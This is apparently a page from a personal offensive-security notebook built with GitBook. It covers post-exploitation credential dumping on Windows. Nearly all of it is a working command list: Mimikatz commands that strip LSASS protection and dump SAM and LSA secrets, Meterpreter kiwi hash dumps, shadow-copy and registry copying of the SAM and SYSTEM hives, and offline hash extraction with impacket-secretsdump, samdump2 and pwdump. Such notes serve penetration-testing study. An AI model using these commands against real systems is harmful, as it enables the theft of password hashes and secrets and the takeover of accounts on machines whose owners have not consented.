OffSec Notes
search
⌘Ctrlk
All Gitbook
OffSec Notes
  • Useful
  • Attack
    • Client Side Code Execution
    • Evasions
    • MS SQL
    • Kiosk Breakout
    • Active Directory
  • Post-Exploitation
    • Windows Credentials
      • Local Administrator Password Solution (LAPS)
      • Serivce Account Access Token
      • Mimikatz Abusing Kerberos
    • Linux
  • Network
    • Bypass Network Filters
    • Windows Lateral Movement
    • Linux Lateral Movement
    • Ligolo
  • Checklist / Flow
gitbookPowered by GitBook
block-quoteOn this pagechevron-down
  1. Post-Exploitation

Windows Credentials

Password hash dump and reusechevron-right
LogoPassword Dumping Cheatsheet: WindowsHacking Articleschevron-right
LogoHow to use Mimikatz for Hacking in 2026: The Definitive GuideStationXchevron-right
LogoOSEP_OSED_TOOLS/OSEP_enum.ps1 at main · jayesther/OSEP_OSED_TOOLSGitHubchevron-right
OSEP Enum

hashtag
Local

hashtag
SID in SAM

circle-info

hashtag
Mimikatz

hashtag
Alternative from LSA

hashtag
Meterpreter Kiwi

hashtag
Shadow Copy (admin)

hashtag
Registry (admin)

hashtag
Decrypt

PreviousJust-In-Time (JIT) Accesschevron-leftNextLocal Administrator Password Solution (LAPS)chevron-right

Last updated 1 year ago

  • Local
  • SID in SAM
  • Mimikatz
  • Shadow Copy (admin)
  • Registry (admin)
  • Decrypt
PowerShell
$env:computername
[wmi] "Win32_userAccount.Domain='client',Name='Administrator'"
S-1-5-21-1673717583-1524682655-2710527411-500
whoami /user
privilege::debug
token::elevate
!+
!processprotect /process:lsass.exe /remove
sekurlsa::credman
lsadump::sam
lsadump::secrets
privilege::debug
lsadump::lsa /patch
lsadump::lsa /inject
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > lsa_dump_sam
meterpreter > lsa_dump_secrets
1) cmd
wmic shadowcopy call create Volume='C:\'
2) cmd
vssadmin list shadows
3) cmd
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\sam

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system
cmd
reg save HKLM\sam C:\users\offsec.corp1\Downloads\sam
reg save HKLM\system C:\users\offsec.corp1\Downloads\system
in Kali
impacket-secretsdump -system SYSTEM -sam SAM LOCAL
samdump2 SYSTEM SAM
python pwdump.py /home/kali/system /home/kali/sam